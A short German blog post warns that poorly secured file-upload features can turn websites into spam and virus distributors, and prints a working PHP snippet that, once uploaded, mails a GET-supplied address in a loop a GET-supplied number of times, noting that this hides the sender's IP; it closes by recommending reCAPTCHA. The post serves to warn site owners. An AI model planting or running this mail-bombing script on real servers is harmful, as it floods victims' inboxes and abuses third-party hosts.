Wir haben schon auf allen möglichen Websites darauf hingewiesen, Dateiuploadmöglichkeiten genügend abzusichern. folgende kleines Snippet soll zeigen, wie stinkeinfach es ist eine WebSite mit Dateiupload als Spam und Virenschleuder zu verwenden.
$t="Sp0wnd!";
$n="Y0u @r3 Sp0wnd by ~B4CksT0r~";
$a="~B@(ksT0r~";
$e=$_GET['e'];
$az=$_GET['az'];
for($i=0;$i<$az;$i++){
mail($e, $t, $n,"From: $a <$a>");
}
?>
Dabei ist dieser kleine Mehrzeiler nicht gerade ein Ausbruch an Intelligenz, sondern eher Mittelklasse, da er nicht mehr wie fachliche Grundkenntnisse verlangt und trotzdem wird die IP schön versteckt nur für wenige bekannt garantiert nie den wirklichen Spammer verraten. Es ist andererseits mit der FOR Abfrage schon direkt ein Riesenschritt von den profanen und allseits beliebten Übergabe URLs der Spammer für Gästebücher und andere Kommunikationsmöglichkeiten mit WebSites.
Wir empfehlen zur Spamvermeidung durch ÜbergabeURLs das bewährte ReCaptcha System:
http://www.google.com/recaptcha
Abonnieren
Kommentare zum Post (Atom)
Empfohlener Beitrag
Plauzen Ärger wegen dieser Zensur!
Ich ärgere mich gerade die Plauze wegen dieser unverhohlenen Zensur! Nachdem ich Cookie Banner aus Vorsicht und nicht wegen Notwendigkeit in...
Keine Kommentare:
Kommentar veröffentlichen